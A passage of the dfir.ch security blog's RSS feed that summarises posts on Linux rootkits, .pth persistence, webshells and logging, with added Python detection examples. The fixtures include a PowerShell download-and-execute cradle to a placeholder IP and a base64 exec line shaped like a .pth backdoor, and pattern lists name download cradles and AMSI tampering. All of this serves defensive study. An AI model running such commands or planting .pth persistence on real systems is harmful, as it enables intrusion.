To gain insight into common issues and patterns of misconfiguration, we analyzed 250 PingCastle reports collected from Incident Response cases and Compromise Assessments.</description>
      
    </item>
    
    <item>
      <title>Analysis of Python&#39;s .pth files as a persistence mechanism</title>
      <link>https://dfir.ch/posts/publish_python_pth_extension/</link>
      <pubDate>Tue, 14 Jan 2025 03:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/publish_python_pth_extension/</guid>
      
      <description>Introduction The purpose of the update.py script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in Python, starts with an import statement, and its main content is stored as a base64-encoded blob. A .pth file in a site-packages directory is processed by the site module at interpreter startup; each line it contains is normally added to sys.path as an additional module search path. Starting with the release of Python 3.5, lines in .pth files beginning with the text “import” followed by a space or a tab are executed, as described in the official documentation.</description>
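Added example (not the post's code): the Python below first demonstrates the mechanism itself, writing a .pth file into a throwaway directory and letting site.addsitedir() execute its import line, and then the hunting side, a scanner that walks the interpreter's site directories, reports every executable line in a .pth file and decodes base64 blobs found on it. The backdoor-shaped sample line is constructed, and its blob decodes to a harmless print call rather than any real payload.

```python
import base64
import binascii
import os
import re
import site
import tempfile

IMPORT_LINE = re.compile(r"^import[ \t]")
# Calls that have no business in a path-configuration file (assumption: a starter list).
SUSPICIOUS_CALLS = ("exec(", "eval(", "compile(", "b64decode", "subprocess", "socket", "__import__")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def demo_pth_executes():
    """The mechanism: site.addsitedir() processes every .pth file in a directory and exec()s
    each line that starts with 'import ' or 'import\\t'. Returns the marker the line set."""
    sitedir = tempfile.mkdtemp()
    marker = "PTH_DEMO_%d" % os.getpid()
    with open(os.path.join(sitedir, "demo.pth"), "w") as f:
        f.write("import os; os.environ[%r] = 'executed by .pth'\n" % marker)
    site.addsitedir(sitedir)
    return os.environ.get(marker)


def scan_pth_text(text, source="pth"):
    """One finding per executable line in a .pth body; plain path lines are ignored."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not IMPORT_LINE.match(line):
            continue
        finding = {"source": source, "line": lineno, "code": line,
                   "suspicious": [c for c in SUSPICIOUS_CALLS if c in line], "decoded": []}
        for blob in B64_BLOB.findall(line):
            try:
                raw = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                continue                       # not base64 after all (identifier, path, ...)
            finding["decoded"].append(raw.decode("utf-8", "replace")[:120])
        findings.append(finding)
    return findings


def scan_site_dirs(extra_dirs=()):
    """Scan every .pth in the interpreter's site directories, plus any directories passed in."""
    dirs = list(extra_dirs)
    try:
        dirs += site.getsitepackages()
    except AttributeError:                     # some virtualenv layouts lack this helper
        pass
    dirs.append(site.getusersitepackages())
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.endswith(".pth"):
                path = os.path.join(d, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings += scan_pth_text(f.read(), path)
    return findings


# Constructed sample shaped like the system.pth payload described above; the blob here
# decodes to print("pth"), not to the real backdoor.
SAMPLE_BACKDOOR_PTH = 'import base64,sys;exec(base64.b64decode("cHJpbnQoInB0aCIp"))\n'
```

Every interpreter on the host has its own site directories (system Python, distro tools, virtualenvs, pyenv builds), so run scan_site_dirs() under each of them or pass the directories explicitly; legitimate editable installs and import hooks also use import lines, so the decoded content, not the mere presence of an import line, is what separates a backdoor from setuptools.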
      
    </item>
    
    <item>
      <title>Today I Learned - setfacl</title>
      <link>https://dfir.ch/posts/today_i_learned_setfacl/</link>
      <pubDate>Tue, 17 Dec 2024 08:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_setfacl/</guid>
      
      <description>Introduction setfacl is a command-line utility in Linux/Unix systems used to set Access Control Lists (ACLs) on files and directories. ACLs provide a more flexible permission mechanism than the traditional owner-group-other model. They allow for the assignment of specific permissions to individual users or groups beyond what the basic file system permissions support.
setfacl [options] [permissions] file/directory Options:
-m: Modify or add an ACL entry. -x: Remove an ACL entry. -b: Remove all ACL entries.</description>
      
    </item>
    
    <item>
      <title>Shell Script Compiler (shc)</title>
      <link>https://dfir.ch/posts/shell_script_compiler/</link>
      <pubDate>Wed, 11 Dec 2024 14:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/shell_script_compiler/</guid>
      
      <description>Introduction “After installing the payload, the shell script inst.sh runs a backdoor binary that matches the target device’s architecture. The backdoor is a shell script compiled using an open-source project called Shell Script Compiler (shc), and enables the threat actors to perform subsequent malicious activities and deploy additional tools on affected systems.”
Source: IoT devices and Linux-based systems targeted by OpenSSH trojan campaign, Microsoft Threat Intelligence
In this blog post, we will analyze Shc - A generic shell script compiler, the project mentioned by Microsoft in the blog post linked above.</description>
      
    </item>
    
    <item>
      <title>DeepSec: RAT Builders - How to catch them all</title>
      <link>https://dfir.ch/talks/deepsec_2024/</link>
      <pubDate>Thu, 21 Nov 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/deepsec_2024/</guid>
      
      <description>Abstract Cybercriminals now have unprecedented ease in creating their own remote access trojans (RATs), thanks to a plethora of open-source or leaked builders. One can generate a new binary with just a click of a button. We meticulously examine different builders, such as AgentTesla, DCRat, Nanocore, and others, to extract Indicators of Compromise. These indicators serve as valuable instruments for targeted hunting to detect infections within our networks. Building up on my research from last year, “N-IOC’s to rule them all”, we will analyze the binaries the same way, but this time with a focus on open-source builders for RATs.</description>
      
    </item>
    
    <item>
      <title>BSides Munich: /proc for Security Analysts</title>
      <link>https://dfir.ch/talks/bsides_munich_2024/</link>
      <pubDate>Mon, 11 Nov 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/bsides_munich_2024/</guid>
      
      <description>Abstract In the intricate landscape of cybersecurity, the ability to uncover hidden threats and analyze system behaviors is paramount.
The /proc filesystem, a critical component of Unix-like operating systems, serves as a treasure trove of real-time data and system information. This talk, “/proc for Security Analysts,” will delve into the forensic value of /proc, demonstrating how it can be leveraged to detect rootkits, uncover anomalies, and gain a profound understanding of the operating system.</description>
      
    </item>
    
    <item>
      <title>Reptile&#39;s Custom Kernel-Module Launcher</title>
      <link>https://dfir.ch/posts/reptile_launcher/</link>
      <pubDate>Sun, 10 Nov 2024 14:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/reptile_launcher/</guid>
      
      <description>Introduction “In REPTILE version 2.0, the original developer of REPTILE altered how the Kernel-level component is loaded, switching from using insmod to a custom launcher. The launcher Mandiant observed UNC3886 use throughout their operations, based on the custom launcher, was updated with a new function to daemonize a process.” — Mandiant, Cloaked and Covert: Uncovering UNC3886 Espionage Operations, 2024.
This analysis will examine how the Reptile rootkit loader bypasses the standard Linux insmod command for loading Kernel modules and will explore methods for detecting the use of this custom loader.</description>
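Added example, not from the post: whatever launcher replaces insmod, the module still enters the kernel through the init_module or finit_module system call, so a detection that keys on the syscall rather than on the insmod binary survives the swap. The Python below parses auditd SYSCALL records produced by a rule on those two syscalls and flags loads whose exe= is not the distribution's module loader. The audit lines, the loader whitelist and the launcher path are constructed assumptions; the syscall numbers are the x86_64 ones (arch=c000003e).

```python
import re

# auditctl rule that produces the records parsed below (standard auditctl syntax).
AUDIT_RULE = "-a always,exit -F arch=b64 -S init_module -S finit_module -S delete_module -k modules"

# x86_64 syscall numbers of the module-loading entry points.
MODULE_SYSCALLS = {"175": "init_module", "313": "finit_module"}
# Binaries that legitimately load modules. On kmod-based distributions insmod and modprobe are
# symlinks to kmod, so exe= shows the kmod path. Assumption: adjust to the distribution in use.
EXPECTED_LOADERS = ("/usr/bin/kmod", "/bin/kmod", "/sbin/insmod", "/usr/sbin/insmod",
                    "/sbin/modprobe", "/usr/sbin/modprobe")

# key=value or key="quoted value" pairs of an audit record.
KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_audit_line(line):
    """Turn one audit record into a dict; quoted values lose their quotes."""
    fields = {}
    for key, value in KV.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        fields[key] = value
    return fields


def module_load_events(lines):
    """Every SYSCALL record for init_module/finit_module, annotated with whether the calling
    executable is one of the expected loaders."""
    hits = []
    for line in lines:
        f = parse_audit_line(line)
        if f.get("type") != "SYSCALL" or f.get("arch") != "c000003e":
            continue
        name = MODULE_SYSCALLS.get(f.get("syscall"))
        if not name:
            continue
        hits.append({"syscall": name, "exe": f.get("exe"), "comm": f.get("comm"),
                     "pid": f.get("pid"), "success": f.get("success"), "msg": f.get("msg"),
                     "expected": f.get("exe") in EXPECTED_LOADERS})
    return hits


def unexpected_loaders(lines):
    """Module loads performed by anything other than the expected loader binaries."""
    return [h for h in module_load_events(lines) if not h["expected"]]


# Constructed audit records (not from a real host): a modprobe run via kmod, a load performed by
# a hypothetical launcher in /dev/shm, and an unrelated execve for contrast.
SAMPLE_AUDIT = [
    'type=SYSCALL msg=audit(1700000000.101:301): arch=c000003e syscall=313 success=yes exit=0 '
    'a0=3 a1=7ffd1c2e3f40 a2=0 a3=0 items=0 ppid=1 pid=2201 auid=1000 uid=0 gid=0 euid=0 '
    'comm="modprobe" exe="/usr/bin/kmod" key="modules"',
    'type=SYSCALL msg=audit(1700000000.202:302): arch=c000003e syscall=313 success=yes exit=0 '
    'a0=3 a1=0 a2=0 a3=0 items=0 ppid=2290 pid=2291 auid=4294967295 uid=0 gid=0 euid=0 '
    'comm="launcher" exe="/dev/shm/launcher" key="modules"',
    'type=SYSCALL msg=audit(1700000000.303:303): arch=c000003e syscall=59 success=yes exit=0 '
    'a0=55 a1=0 a2=0 a3=0 items=2 ppid=1 pid=2300 auid=1000 uid=1000 gid=1000 euid=1000 '
    'comm="bash" exe="/usr/bin/bash" key="exec"',
]
```

A launcher can also hide the module file by passing an anonymous or already-unlinked descriptor to finit_module, which is why the record's a0 and the PATH/CWD records that accompany it are worth keeping; the syscall itself cannot be avoided without the kernel's cooperation, and kernel.modules_disabled=1 closes even that door until reboot.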
      
    </item>
    
    <item>
      <title>Hack.lu: The Gist of Hundreds of Incident Response Cases</title>
      <link>https://dfir.ch/talks/hack.lu_gist_2024/</link>
      <pubDate>Wed, 23 Oct 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/hack.lu_gist_2024/</guid>
      
      <description>Abstract How to become an Incident Response Rockstar? After conducting hundreds of Incident Response cases, more data is not always better. Focusing on the most relevant forensic data can speed up the investigation process rapidly. In this talk, we will discuss the importance of various event logs to track down lateral movement paths from the attackers, how to find planted (and seemingly legitimate) backdoors, and how you can work smarter, not harder - which also holds true in digital forensics.</description>
      
    </item>
    
    <item>
      <title>Hack.lu: In-Depth Study of Linux Rootkits: Evolution, Detection, and Defense</title>
      <link>https://dfir.ch/talks/hack.lu_rootkits_2024/</link>
      <pubDate>Tue, 22 Oct 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/hack.lu_rootkits_2024/</guid>
      
      <description>Abstract This talk, “In-Depth Study of Linux Rootkits,” will provide a comprehensive examination of the evolution of Linux rootkits, from their inception to the sophisticated variants seen today. Participants will gain insights into advanced rootkit techniques, effective detection strategies, and the future landscape for defenders. By exploring the historical context, current methodologies, and emerging threats, attendees will be equipped with the knowledge and tools necessary to safeguard Linux systems against rootkit attacks.</description>
      
    </item>
    
    <item>
      <title>bedevil: Dynamic Linker Patching</title>
      <link>https://dfir.ch/posts/bedevil_dynamic_linker_patching/</link>
      <pubDate>Sat, 19 Oct 2024 11:03:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/bedevil_dynamic_linker_patching/</guid>
      
      <description>Introduction bedevil (bdvl), according to the GitHub page, is an LD_PRELOAD rootkit. Therefore, this rootkit runs in userland. The group Muddled Libra used bedevil to target VMware vCenter servers, according to Palo Alto’s Unit42 Blog, 2024. The rootkit comes with a nifty feature called Dynamic Linker Patching:
Upon installation, the rootkit will patch the dynamic linker libraries. Before anything, the rootkit will search for a valid ld.so on the system to patch.</description>
      
    </item>
    
    <item>
      <title>Microsoft Defender XDR&#39;s Deception Technology</title>
      <link>https://dfir.ch/posts/defender_xdr_deception/</link>
      <pubDate>Thu, 10 Oct 2024 10:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/defender_xdr_deception/</guid>
      
      <description>Introduction This week wasn’t the first time we’ve investigated a case where a customer reported suspicious accounts that couldn’t be linked to any employees. In this case, two domain admin users were found on the affected network, but neither is employed by the company. Both accounts had logged into nearly every device within the organization, which understandably caused concern among those responsible, prompting them to ask us to investigate further.</description>
      
    </item>
    
    <item>
      <title>tmate - Instant Terminal Sharing (or How To Backdoor a Linux Server)</title>
      <link>https://dfir.ch/posts/tmate_as_a_backdoor/</link>
      <pubDate>Sun, 06 Oct 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/tmate_as_a_backdoor/</guid>
      
      <description>Introduction Over the last three years, various cyber security companies wrote about TeamTNT TTPs, notably about the use of tmate as their tool of choice for backdooring Linux servers after a compromise:
TeamTNT: Cryptomining Explosion (Intezer, 2021)
Attackers Abusing Various Remote Control Tools (ASEC, 2022)
TeamTNT Reemerged with New Aggressive Cloud Campaign (Aqua, 2023)
In this short blog post, we examine the traces left behind by a tmate installation and give some hints on where to look when actively hunting for backdoored Linux servers with a tmate instance running.</description>
      
    </item>
    
    <item>
      <title>EDR: The Great Escape - RomHack Training Review</title>
      <link>https://dfir.ch/posts/romhack_edr/</link>
      <pubDate>Mon, 30 Sep 2024 11:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/romhack_edr/</guid>
      
      <description>This course aims to provide a comprehensive understanding of the architecture of modern EDRs and their underlying Antivirus (AV) systems. It delves deeply into the complexity of modern EDRs, their structure, including the components responsible for real-time monitoring, data collection, and threat analysis.
[..]
50% of the course will be dedicated to hands-on labs showing how to translate the theory principles into practice. Labs are designed to provide flexibility in terms of complexity and include bonus tracks to ensure that you always feel engaged and have something interesting to explore and learn.</description>
      
    </item>
    
    <item>
      <title>Today I Learned - NSG Flow Log</title>
      <link>https://dfir.ch/posts/today_i_learned_nsg_flow_log/</link>
      <pubDate>Sat, 21 Sep 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_nsg_flow_log/</guid>
      
      <description>Introduction Azure flow logs are a feature in Azure that allows you to capture and analyze network traffic to and from virtual network interfaces (NICs) in Azure. Specifically, flow logs provide granular data about IP traffic flowing through a Network Security Group (NSG). Azure automatically creates a network security group (NSG) when you create a virtual machine: $vmname-nsg.
This data includes information on the source and destination IP addresses, ports, and protocols, as well as traffic allowed or denied by NSG rules.</description>
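Added example (not from the post): NSG flow logs arrive as JSON blobs whose records carry, per NSG rule and per MAC, a list of comma-separated flow tuples. The Python below parses the version-2 tuple layout (time, source, destination, ports, protocol, direction, decision, flow state and the four traffic counters), then answers two questions an analyst asks first: which sources are being denied inbound, and which accepted inbound flows reach administrative ports from outside the internal address plan. The JSON document, the addresses and the internal ranges are constructed assumptions.

```python
import ipaddress
import json
from collections import Counter, namedtuple

Flow = namedtuple("Flow", "rule time src dst sport dport proto direction decision state "
                          "pkts_s2d bytes_s2d pkts_d2s bytes_d2s")

# The organisation's internal address plan (assumption: RFC 1918 here; use the real VNet ranges).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ADMIN_PORTS = {22, 3389, 5985, 5986}


def _num(field):
    return int(field) if field else None


def parse_flow_tuple(rule, tup):
    """Version-2 tuple: time,src,dst,srcport,dstport,proto,direction,decision,state,
    packets S2D,bytes S2D,packets D2S,bytes D2S. The counters are empty while state is B
    (begin). Version-1 tuples stop after the decision and are padded here."""
    f = tup.split(",")
    if len(f) == 8:
        f += [""] * 5
    if len(f) != 13:
        raise ValueError("expected 8 or 13 comma-separated fields: %r" % tup)
    return Flow(rule, int(f[0]), f[1], f[2], int(f[3]), int(f[4]),
                {"T": "tcp", "U": "udp"}.get(f[5], f[5]),
                {"I": "in", "O": "out"}.get(f[6], f[6]),
                {"A": "allow", "D": "deny"}.get(f[7], f[7]),
                f[8], _num(f[9]), _num(f[10]), _num(f[11]), _num(f[12]))


def parse_flow_log(doc):
    """Walk records[].properties.flows[] (one per rule) and flows[].flowTuples[] (one per MAC)."""
    flows = []
    for record in doc.get("records", []):
        for rule_block in record.get("properties", {}).get("flows", []):
            rule = rule_block.get("rule", "")
            for mac_block in rule_block.get("flows", []):
                for tup in mac_block.get("flowTuples", []):
                    flows.append(parse_flow_tuple(rule, tup))
    return flows


def is_internal(address):
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in INTERNAL_NETS)


def denied_inbound_by_source(flows):
    """Who keeps knocking: count of denied inbound flows per source address."""
    return Counter(f.src for f in flows if f.direction == "in" and f.decision == "deny")


def exposed_admin_sessions(flows):
    """Accepted inbound flows to admin ports from addresses outside the internal plan."""
    return {(f.src, f.dst, f.dport) for f in flows
            if f.direction == "in" and f.decision == "allow"
            and f.dport in ADMIN_PORTS and not is_internal(f.src)}


# Constructed flow-log document (not real tenant data), trimmed to the fields used above.
SAMPLE_FLOW_LOG = json.loads("""
{"records": [{"time": "2024-09-20T10:00:00.0000000Z", "category": "NetworkSecurityGroupFlowEvent",
  "resourceId": "/SUBSCRIPTIONS/11111111-2222-3333-4444-555555555555/RESOURCEGROUPS/RG1/PROVIDERS/MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/VM1-NSG",
  "properties": {"Version": 2, "flows": [
    {"rule": "DefaultRule_DenyAllInBound", "flows": [{"mac": "000D3AF87856", "flowTuples": [
      "1726826400,198.51.100.7,10.0.0.4,51000,445,T,I,D,B,,,,",
      "1726826401,198.51.100.7,10.0.0.4,51001,445,T,I,D,B,,,,",
      "1726826402,203.0.113.9,10.0.0.4,52000,3389,T,I,D,B,,,,"]}]},
    {"rule": "UserRule_AllowRDP", "flows": [{"mac": "000D3AF87856", "flowTuples": [
      "1726826403,203.0.113.9,10.0.0.4,52001,3389,T,I,A,B,,,,",
      "1726826404,10.0.0.5,10.0.0.4,40000,22,T,I,A,B,,,,",
      "1726826405,10.0.0.4,13.67.143.118,44062,443,T,O,A,E,10,1200,12,5000"]}]}]}}]}
""")
```

Flow logs land hourly as PT1H.json blobs in the storage account; concatenate the records arrays before calling parse_flow_log(), and remember that byte counters only appear on C (continuing) and E (end) tuples, so a volume-based exfiltration check has to wait for those.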
      
    </item>
    
    <item>
      <title>ScriptBlock Smuggling</title>
      <link>https://dfir.ch/posts/scriptblock_smuggling/</link>
      <pubDate>Fri, 13 Sep 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/scriptblock_smuggling/</guid>
      
      <description>Introduction PowerShell’s Script Block Logging is a security feature that records and logs the contents of all scripts and commands executed within PowerShell. This includes both legitimate administrative scripts and potentially malicious commands. When enabled, Script Block Logging generates detailed logs stored in the Windows Event Log under Microsoft-Windows-PowerShell/Operational.
I have previously tweeted several times about PowerShell and why monitoring the executed PowerShell scripts is so important. A few of these tweets are listed here.</description>
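Added example, not from the post: Script Block Logging writes Event ID 4104 to Microsoft-Windows-PowerShell/Operational, and long blocks are split across several records that share a ScriptBlockId and carry MessageNumber/MessageTotal. Detection logic that runs per event therefore sees fragments; the Python below stitches the fragments back together, reports blocks with missing parts, and only then runs a small pattern set over the full text. The event records and the pattern list are constructed assumptions (exported event fields are modelled as plain dicts).

```python
import re
from collections import defaultdict

# Patterns worth a second look in reassembled script blocks (assumption: a starter list).
SUSPICIOUS = {
    "download-cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "in-memory-exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64-payload": re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I),
    "amsi-tamper": re.compile(r"amsiInitFailed|AmsiUtils", re.I),
}


def reassemble_4104(events):
    """Group Event ID 4104 records by ScriptBlockId and stitch the MessageNumber/MessageTotal
    fragments back into the full script block. Returns {ScriptBlockId: {...}}."""
    chunks, totals, paths = defaultdict(dict), {}, {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        sid = ev["ScriptBlockId"]
        chunks[sid][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        totals[sid] = int(ev["MessageTotal"])
        paths[sid] = ev.get("Path") or ""
    blocks = {}
    for sid, parts in chunks.items():
        missing = [n for n in range(1, totals[sid] + 1) if n not in parts]
        blocks[sid] = {
            "text": "".join(parts[n] for n in sorted(parts)),
            "complete": not missing,
            "missing": missing,
            "path": paths[sid],            # empty for interactive or in-memory blocks
        }
    return blocks


def detect(blocks):
    """Run the pattern set over each reassembled block. Incomplete blocks are reported too,
    because a missing fragment is itself a signal (log tampering, dropped events)."""
    results = []
    for sid, block in blocks.items():
        tags = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(block["text"]))
        if tags or not block["complete"]:
            results.append({"ScriptBlockId": sid, "tags": tags,
                            "complete": block["complete"], "path": block["path"]})
    return results


# Constructed 4104 records (not from a real host): a two-part download cradle delivered out of
# order, a benign maintenance script, a block with two fragments missing, and a non-4104 event.
SAMPLE_4104 = [
    {"EventID": 4104, "ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "DownloadString('http://198.51.100.7/p.ps1'))", "Path": ""},
    {"EventID": 4104, "ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "IEX ((New-Object Net.WebClient).", "Path": ""},
    {"EventID": 4104, "ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
     "Path": "C:\\ops\\cleanup.ps1"},
    {"EventID": 4104, "ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "$e = [Convert]::FromBase64String($s);", "Path": ""},
    {"EventID": 4103, "ScriptBlockId": "zz", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "pipeline execution detail, not a script block"},
]
```

The fragments of one block can be minutes apart and interleaved with other blocks, so reassembly needs the whole export (or a SIEM aggregation keyed on ScriptBlockId), not a sliding window over the last few events; the empty Path field separates blocks typed or injected into memory from scripts that exist on disk.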
      
    </item>
    
    <item>
      <title>Botnet Fenix</title>
      <link>https://dfir.ch/posts/botnex_fenix/</link>
      <pubDate>Thu, 22 Aug 2024 12:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/botnex_fenix/</guid>
      
      <description>Introduction To improve my rusty reverse-engineering skills, I’m going to analyze various malware samples that have come up in our incident response cases in loose succession. The first sample belongs to the Fenix botnet (sample here).
In this post, we analyze a sophisticated malware infection chain that begins with a user downloading a ZIP file from a Dropbox link and culminates in the execution of a malicious shellcode.
First Stage The infection chain begins when the user downloads a ZIP file from Dropbox using the Edge browser.</description>
      
    </item>
    
    <item>
      <title>Today I Learned - WebDAV Cache</title>
      <link>https://dfir.ch/posts/today_i_learned_webdav_cache/</link>
      <pubDate>Fri, 09 Aug 2024 01:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_webdav_cache/</guid>
      
      <description>Introduction User @karol_paciorek recently tweeted about an open directory containing malware, depicted in Figure 1. You can find the original post here:
Figure 1: opendir: 216.9.224[.]58:5555 Along with the MS_calendar.lnk file mentioned in the tweet from @karol_paciorek, there are additional files publicly available on that server:
LNK Analysis We will examine the LNK file schedule.lnk (MD5: 62d5389d43931237e9d3d1aa77c87483), located in the same directory as the MS_calendar.lnk file. To analyze it, we will use LECMD.</description>
      
    </item>
    
    <item>
      <title>Abusing the “search-ms” URI protocol handler</title>
      <link>https://dfir.ch/posts/search-ms_protocol_handler/</link>
      <pubDate>Sun, 04 Aug 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/search-ms_protocol_handler/</guid>
      
      <description>Introduction Last month, I stumbled upon a blog post from Trustwave titled Search &amp;amp; Spoof: Abuse of Windows Search to Redirect to Malware.
Figure 1: Search &amp; Spoof: Abuse of Windows Search to Redirect to Malware (Source: Trustwave) Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware. We found the threat actors utilizing a sophisticated understanding of system vulnerabilities and user behaviors.</description>
      
    </item>
    
    <item>
      <title>Tainted Kernels</title>
      <link>https://dfir.ch/posts/tainted_kernels/</link>
      <pubDate>Fri, 12 Jul 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/tainted_kernels/</guid>
      
      <description>Introduction A tainted kernel in Linux refers to a kernel that has been marked with one or more flags indicating that it is in a state that might affect its stability or functionality. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access. Source: elastic
Here are the main reasons a kernel might become tainted (list might not be exhaustive):</description>
      
    </item>
    
    <item>
      <title>Today I Learned - kernel.modules_disabled</title>
      <link>https://dfir.ch/posts/today_i_learned_lkm_kernel.modules_disabled/</link>
      <pubDate>Wed, 10 Jul 2024 03:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_lkm_kernel.modules_disabled/</guid>
      
      <description>Introduction The kernel.modules_disabled parameter is a security feature in the Linux kernel that prevents the loading and unloading of kernel modules. This setting is particularly useful for hardening a system against certain types of attacks, such as attempts to load malicious kernel modules (think rootkits) or manipulate the system at a low level. Mandiant recently published a blog post where they found, among other toolings used by the attackers, REPTILE. REPTILE is an open-source Linux rootkit, implemented as a loadable kernel module (LKM), that provides backdoor access to a system.</description>
      
    </item>
    
    <item>
      <title>Systemd Path Activation - Poor Man&#39;s File Integrity</title>
      <link>https://dfir.ch/posts/systemd_path_activation/</link>
      <pubDate>Sat, 22 Jun 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/systemd_path_activation/</guid>
      
      <description>This blog post outlines a method for monitoring changes to files and directories in Linux using path units. Administrators and defenders can be notified of modifications by creating a new path unit, which watches for changes to files and directories, and linking it to a service unit that executes a script when changes are detected. This setup might be particularly useful for detecting unauthorized access in environments where installing EDR solutions is not feasible.</description>
      
    </item>
    
    <item>
      <title>From Dangerous PHP Functions to Webshell Hunting</title>
      <link>https://dfir.ch/posts/php_dangerous_functions_and_webshell/</link>
      <pubDate>Mon, 17 Jun 2024 09:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/php_dangerous_functions_and_webshell/</guid>
      
      <description>This blog post discusses how to enhance PHP security using the disable_functions directive, which prevents specific PHP functions from being executed. We further explore webshell detection techniques, highlighting the challenges of identifying webshells using Yara rules, proposing alternatives like manual analysis, frequency analysis of web server logs, and utilizing tools like Velociraptor and UAC along the way.
Introduction The disable_functions directive in PHP is a security feature that allows administrators to disable specific PHP functions from being executed within PHP scripts.</description>
      
    </item>
    
    <item>
      <title>FIRST Conference: (Advanced) Purple Teaming - BlueTeam Edition</title>
      <link>https://dfir.ch/talks/firstcon_2024/</link>
      <pubDate>Sun, 09 Jun 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/firstcon_2024/</guid>
      
      <description>Abstract How can the bad guys breach our defenses so fast? In this training, we will touch on different advanced topics that will give you a better understanding of how attacks are carried out and how we can protect ourselves better against them.
Windows Credentials: The various forms of credentials and how they are used during authentication. We will learn how attackers can steal these credentials and move laterally with them.</description>
      
    </item>
    
    <item>
      <title>Today I Learned - Instrument ClamAV to extract AutoIT scripts</title>
      <link>https://dfir.ch/posts/today_i_learned_clamav_autoit/</link>
      <pubDate>Sun, 09 Jun 2024 04:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_clamav_autoit/</guid>
      
      <description>Introduction A customer contacted us because they intend to use SimpleLAPS-GUI in their company. However, multiple AV vendors flag the precompiled binary (SimpleLapsGui.exe) as malicious (see here). According to the FAQ on the GitHub repository from SimpleLAPS-GUI:
Does the exe version contain viruses? It is reported on &amp;ldquo;virustotal.com&amp;rdquo;.
No it doesn&amp;rsquo;t. This happens because of the AutoIT v3 executable used as wrapper. You can download the PowerShell version instead. (Please note that the PowerShell script doesn&amp;rsquo;t hide its window.</description>
      
    </item>
    
    <item>
      <title>SecurityFest: The Gist of Hundreds of Incident Response cases</title>
      <link>https://dfir.ch/talks/securityfest_2024/</link>
      <pubDate>Fri, 31 May 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/securityfest_2024/</guid>
      
      <description>Abstract How to become an Incident Response Rockstar? After conducting hundreds of Incident Response cases, more data is not always better. Focusing on the most relevant forensic data can speed up the investigation process rapidly. In this talk, we will discuss the importance of various event logs to track down lateral movement paths from the attackers, how to find planted (and seemingly legitimate) backdoors, and how you can work smarter, not harder - which also holds true in digital forensics.</description>
      
    </item>
    
    <item>
      <title>Today I Learned - Zsh Sessions (even more Timestamps)</title>
      <link>https://dfir.ch/posts/today_i_learned_zsh_sessions/</link>
      <pubDate>Sun, 26 May 2024 09:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_zsh_sessions/</guid>
      
      <description>Zsh Sessions In a previous blog post (Today I Learned - Zsh History Timestamps), we discussed how Zsh records commands entered in the shell along with a timestamp, provided that the session remains open. This is useful for live response scenarios if we still have access to the session and can run commands like fc -lf or fc -li 100. However, Zsh also utilizes the .zsh_sessions directory, located at the root level of the user&amp;rsquo;s home directory.</description>
      
    </item>
    
    <item>
      <title>The &#39;Invisibility Cloak&#39; - Slash-Proc Magic</title>
      <link>https://dfir.ch/posts/slash-proc/</link>
      <pubDate>Thu, 16 May 2024 10:40:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/slash-proc/</guid>
      
